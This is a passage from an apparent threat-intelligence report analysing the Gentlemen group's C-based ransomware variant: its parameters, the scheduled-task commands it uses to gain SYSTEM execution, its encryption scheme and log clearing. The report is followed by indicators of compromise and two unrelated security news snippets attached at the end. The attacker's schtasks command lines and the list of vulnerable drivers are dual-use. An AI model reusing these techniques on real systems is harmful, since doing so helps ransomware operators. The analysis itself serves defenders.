Parameter Description --password The ransomware needs a password to execute, which is meant to prevent execution on automated systems --remove The ransomware removes itself after the encryption process has been finished --T Sleep time before encryption, in seconds --ex Likely stands for excluded objects (not implemented) --fast Encryption speed option (not implemented) --superfast Encryption speed option (not implemented) --ultrafast Encryption speed option (not implemented) --silent Likely silent execution (not implemented) --system Execute with system privileges. Could be used to encrypt local disks, as in the Go variant, but at the time of writing this article, there isn’t sufficient data to support this. --shares Encrypt the shares connected to the system (not implemented) --full Full encryption (not implemented) --path Directory list to be encrypted

As can be seen from the parameter list, some of the parameters are not yet implemented. We anticipate that this variant will mature and likely be increasingly used in future attacks. Notably, the C variant uses smaller denylists of files, directories and extensions compared to the Go variant, which further suggests that this version of the ransomware is still in development. For example, the list of files that should not be encrypted, contains only three items, one of which is the group’s ransom note.

To execute with elevated privileges when receiving the --system parameter, the implant creates a scheduled task called “TaskSystem” using the command schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /C cd %s && %s" /st 20:00 /ru system > nul. It then runs the task with elevated privileges using schtasks /run /tn TaskSystem > nul. If “TaskSystem” exists in the target system, the ransomware first deletes it using schtasks /delete /tn TaskSystem /f > nul, before creating a new one with the same name.

If the ransomware lacks sufficient privileges to access a file, it attempts to modify the file’s ACL by granting FULL_CONTROL permission and setting a new EXPLICIT_ACCESS_A structure using the SetEntriesInAclA API call.

For encryption, the ransomware uses the OpenSSL library, which is statically linked to the binary. Unlike the Go variant, this variant uses the AES256-GCM + RSA encryption scheme. It generates a random 32-byte key and a 16-byte initialization vector (IV) for each file, creating a 48-byte buffer. This buffer is then encrypted using a hardcoded RSA public key and appended to the file. The file’s contents are encrypted with AES256-GCM and written after the encrypted key and IV.

After encrypting all files in a directory, the ransomware decodes a byte array using single-byte XOR decryption and creates a file named !-READ-ME—-GEN-TLE-MEN-!.txt in the directory. It then writes the decoded byte array, which contains the ransom note, to the file.

The ransom note in this version of the ransomware reveals a difference from earlier Go versions: communication with the operators is now conducted via email rather than through Tox Messenger.

After completing the encryption process, the ransomware attempts to clear logs from various event log categories, including System, Forwarded Events, Application, and Setup, using the EvtClearLog API. However, it appears that there may be an error in the event log clearing process, as the category "S" is not a valid default entry for an event log category, suggesting a possible typo or missing parameters.

Event clearing function

Victims

The Gentlemen target a wide range of industries worldwide, including manufacturing, IT services, healthcare, financial services, construction, and logistics. Observed intrusions span several regions, with Brazil, China, Indonesia, Taiwan, and Thailand among the most heavily targeted countries and territories according to our telemetry.

Attribution

We have high confidence in attributing the observed activities to The Gentlemen group and its affiliates. This attribution is based on several key factors, including the consistent use of the group’s name, associated email addresses, and Data Leak Site within the binaries and ransom notes.

Conclusion

The Gentlemen group is rapidly gaining traction in the ransomware landscape, recruiting affiliates and executing high-profile attacks. Their adaptability is evident in the emergence of a C-based ransomware variant, a Go-based backdoor enabling remote command execution, and customized scripts tailored to specific targets. Recent data leaks exposing internal communications and operational plans suggest the group will continue to engage in malicious activity. Organizations are advised to prioritize vulnerability management and system hardening to reduce the risk of compromise.

Indicators of compromise

Additional information about this activity, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact [email protected].

Go ransomware

3B46A729DB7AE6AF8B19711C9452194D        locker_eryoo5_windows_amd64
02944C8A5535CDB5B2CBB893DB2D5ACF     locker_lqy8xb_windows_amd64.exe
10CA9A4040001560D053B7E7885C1B95     locker_28f3cl_windows_386.exe
3C471EBC947CDF32240A90FFADF49B13     locker_aga19g_windows_amd64.exe
4BE8BB62F0EBBCF4CE52C35AB6F794F5     locker_wh54td_windows_386.exe
53C616677BC7E2A0A03127F19166D007     locker_p663zs_windows_amd64.exe
5C3B9821FC82A9028CB63B9671950919     locker.exe
5F0B2C6D9F442754258BF4DD841C8341     locker_t1zged_windows_amd64.exe
608FAF58353B65C45EF9833358AC3787     locker_u90lyt_windows_amd64.exe
6AE7C9A7EA0B8C40A64225734F6BD01D     gentle.exe
846DC77C1246DB20D976346E0E359502     locker_p663zs_windows_386.exe
ADAC9984B3CC43D66A0D33079BBEC299     UcAaJ_o_1j9srso9a14071ps4p7s3f81s1b
AE0E536766788478263BF448A9381641     cosmo.exe
B3E418D30312C1B2C58A791286868F42     system_386.exe
C2764744DCB4B0E1DB79CA1E8BF65368     getlwd.exe
D12A5B36DD00586CC374A1CAE43EFED4     locker_c65ffp_windows_amd64.exe
D2F72897E8986303D5567EB2384932B8     UcAaJ_o_1j9srso9a14071ps4p7s3f81s1b
DE1522F9219497632F30F8A6E72F26B6     locker_c7ekh7_windows_amd64.exe
FDAE2BEB813778B4540A997706862096     AIR.exe

C-based ransomware

B9986A0F1F1F1A798DC3F0C59A80A1A3        fin.exe

Backdoor

554E699C96B332468F1AE69C1AE81EF9        sihost.exe

Vulnerable drivers

5761BD63DA03686FC480245DA7BD1E9F        processmonitordriver.sys
B6B51508AD6F462C45FE102C85D246C8        wamsdk.sys
8F0577D28C4FF5F71B149F444BFABA8E        gamedriverx64.sys
525EF6014F0EF20E44FE47C1D9980B69        biontdrv_wink.sys
407B6A136BBAA7172EB44EF9D08BB58A        biontdrv_winbs.sys
9321A61A25C7961D9F36852ECAA86F55        inpoutx64.sys
73F0A8C3EA794A04E80C32038249F044        wsddprm.sys
EEF8A950952696B018AA9C6DA2F5D7AD        havoc.sys

Scanning tools

EDB1C480295250DD1A38F3AA1357DEAE        netscan64.exe
5537C708EDB9A2C21F88E34E8A0F1744        Advanced_IP_Scanner_2.5.4594.1.exe

File paths

\\Netlogon\
C:\Sharing
C:\Temp
C:\Netlogon
C:\Windows\sysvol\domain\scripts\
%TEMP%
%User%\Downloads
%User%\Desktop

Domain and IPs

81[.]177[.]215[.]15    Backdoor C2

Microsoft has shut down a long-running malicious extension operation on the Edge Add-ons store that hid its payloads inside ordinary image and font files, then woke up days after install to steal credentials and run ad fraud. The company calls it StegoAd, a mash-up of steganography and adware, and ties 119 extensions to a single threat actor it says has been active since at least 2021. Swati Khandelwalhttp://www.blogger.com/profile/[email protected]

A public proof-of-concept is now out for CVE-2026-55200, a critical flaw in libssh2 that lets a malicious or compromised SSH server trigger memory corruption on a connecting client, with possible code execution. No credentials, no user interaction. The bug affects every release up to and including 1.11.1 and carries a CVSS 4.0 score of 9.2. libssh2 is a client-side SSH library, not a server. Swati Khandelwalhttp://www.blogger.com/profile/[email protected]